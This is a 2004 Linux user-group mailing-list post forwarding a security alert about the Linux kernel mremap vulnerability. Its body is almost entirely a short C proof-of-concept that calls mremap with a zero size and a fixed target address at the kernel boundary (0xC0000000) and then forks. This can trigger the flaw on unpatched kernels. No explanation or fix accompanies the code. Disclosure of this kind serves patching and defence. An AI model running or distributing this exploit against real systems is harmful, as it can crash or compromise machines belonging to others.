[LUG.ro] Fw: Linux kernel mremap vulnerability
Alberto Ferrer
lugro@lugro.org.ar
Tue, 6 Jan 2004 19:23:57 -0300
--Signature=_Tue__6_Jan_2004_19_23_57_-0300_cHibfaxychsySpqp
Content-Type: text/plain; charset=US-ASCII
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
/* Extraido de LFS-Security */
#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>
#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2
#define __NR_real_mremap __NR_mremap
static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );
int main( void )
{
void *base;
base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );
real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );
fork();
return( 0 );
}
--------------------------
Alberto Ferrer
albertof@barrahome.org
http://www.barrahome.org
JID: albertof@dattatec.com
--------------------------
SNMP = Security? Not My Problem!
--Signature=_Tue__6_Jan_2004_19_23_57_-0300_cHibfaxychsySpqp
Content-Type: application/pgp-signature
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)
iD8DBQE/+zV9quh9sbHnN3gRAqNhAJ49pkkHHwvFwnZK50liMJlel4GDoACeKBYt
+3gJHwlhGR6jfd2hSfxc10A=
=fH0g
-----END PGP SIGNATURE-----
--Signature=_Tue__6_Jan_2004_19_23_57_-0300_cHibfaxychsySpqp--